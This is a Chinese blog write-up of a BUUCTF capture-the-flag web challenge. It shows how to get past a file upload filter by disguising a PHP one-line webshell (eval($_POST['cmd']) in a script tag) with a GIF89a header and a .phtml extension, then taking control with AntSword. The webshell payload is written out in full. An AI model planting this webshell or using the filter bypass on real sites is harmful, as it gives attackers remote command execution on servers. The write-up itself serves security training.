BUU_Web 极客大挑战 Upload

最新推荐文章于 2024-04-26 20:34:17 发布
最新推荐文章于 2024-04-26 20:34:17 发布
阅读量270 收藏
点赞数
分类专栏: BUU
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46635165/article/details/108818825
版权

打开题目网址,文件上传:

尝试上传 webshell.php ,一句话木马:

在这里插入图片描述
看来是不能上传 .php,抓包发现需要上传jpg格式图片:
在这里插入图片描述

将文件后缀格式改成 jpg 格式:

在这里插入图片描述<? 被检测,只能换一种一句话木马了,:
<script language="php">eval($_POST['cmd']);</script>

在这里插入图片描述
提示检测到不完全是图片,写入 jpg 格式文件头,再次上传,仍然显示不完全是图片,写入GIF格式文件头:GIF89a ,再次尝试上传:

在这里插入图片描述
上传成功,接下来需要用 burpsuite ,进行抓包改包,既然 php 后缀不能用了,php常用后缀: php,php3,php4,php5,phtml,pht,phtm,尝试更改后缀,发现 phtml 可用:

在这里插入图片描述
修改文件后缀后,对文件进行访问,进入 /upload下(大佬们提示一般都是 /upload):

在这里插入图片描述
访问成功,打开蚁剑,一键连接,右键打开虚拟终端,cat flag,拿下:

在这里插入图片描述

我在干饭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
[极客挑战 2019]PHP1
陈艺秋的博客
05-27 2427
既然提到了备份网站估计也是存在着网站备份文件,可以先用御剑扫一下啥都没扫出来,但是上回做文件备份的题目时收集了一些关于常用备份文件的文件名和后缀,可以直接使用burp抓包爆破,果然爆破出一个www.zip文件访问下载好文件就有三个php文件,下面进行代码审计。
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3077
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
BUUCTF[极客挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 568
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
[极客挑战 2019]PHP 1
qq_43618536的博客
07-02 462
BUUCTF的[极客挑战 2019]PHP 1 反序列化
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 3690
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
cipher_CIPHER_
09-29
标题中的"Cipher_CIPHER_"可能指的是密码学中的加密算法或安全协议,这在IT行业中是非常重要的一环,特别是在数据传输、网络安全以及信息安全存储等领域。"Hi3520D"则可能是一个芯片型号,通常用于处理视频编码、...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU CTF---[极客挑战 2019]PHP 1
weixin_46685211的博客
05-04 810
文章目录知识点一、备份网站二、代码审计1._wakeup()魔术方法2.GET方法3.类代码4.构造对象参考资料 知识点 1、PHP反序列化 2、绕过魔术方法 __wakeup() 一、备份网站 查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200 import requests url = "url地址" l1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 599
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
qq_51802152的博客
11-30 2116
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
BUUCTF——[极客挑战2019]PHP1
weixin_62248541的博客
11-25 211
BUUCTF——[极客挑战2019]PHP1
[buuoj]极客挑战 2019]PHP 1
qq_42250840的博客
06-28 1275
知识点: 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现: 首先根据提示网站备份文件,考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现: import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.
[极客挑战 2019]Upload
fcz___的博客
03-05 91
但是我们并不知道文件路径。可以猜测实在upload路径下,我们尝试访问upload路径。好,他又说我们的格式不对。应该是会对文件头进行检测。那我们就在文件中加入gif文件头GIF89a。上传后,他又告诉我们,不能含有
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值